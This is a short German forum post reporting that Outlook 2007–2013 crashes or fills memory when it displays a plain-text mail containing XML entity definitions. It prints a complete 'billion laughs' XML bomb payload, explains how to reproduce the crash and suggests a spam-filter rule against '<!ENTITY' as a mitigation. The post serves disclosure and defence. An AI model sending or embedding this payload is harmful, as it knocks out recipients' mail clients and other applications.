Outlook 2007-2013 Anfälligkeit bei eintreffenden Plain-Text-Mails mit XML !ENTITY Inhalt

Die o.a. Outlook-Versionen sind von einem Bug betroffen wenn eine Mail z.B. folgenden Plain-Text Inhalt hat:

<?xml version="1.0"?> 
<!DOCTYPE lolz [
 <!ENTITY lol "lol"> 
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> 
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> 
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> 
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> 
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> 
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> 
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> 
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> 
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> 
]>
<lolz>&lol9;</lolz>

Auch bekannt als XML-Bomb

Wird solch eine Mail von Outlook empfangen und dargestellt kommt es reproduzierbar zum Absturz von Outlook bzw. zum Vollaufen des Arbeitsspeichers. Wenn Outlook so eingestellt ist das die Mail-Vorschau aktiv ist, hängt sich Outlook beim Neustart dann erneut in eine Schleife. Hier hilft dann nur das Starten von Outlook im Safe-Mode und Löschen der Mail.

Ihr könnt den Bug reproduzieren indem Ihr mal eine PlainText-Mail erstellt, und versucht obigen XML-Text dort einzufügen => Geschieht auf eigene Gefahr!

Andere Office-Applikationen wie z.B. Word sind ebenfalls betroffen, da sie den selben XML-Parser benutzen. Microsoft stuft den Bug mit niedriger Priorität ein, verspricht aber den Bug in zukünftigen Outlook-Versionen zu beheben.

Abhilfe kann man sich schaffen indem man seinen SPAM-Filter anweist Mails mit <!ENTITY Inhalt zu filtern.

Grüße @colinardo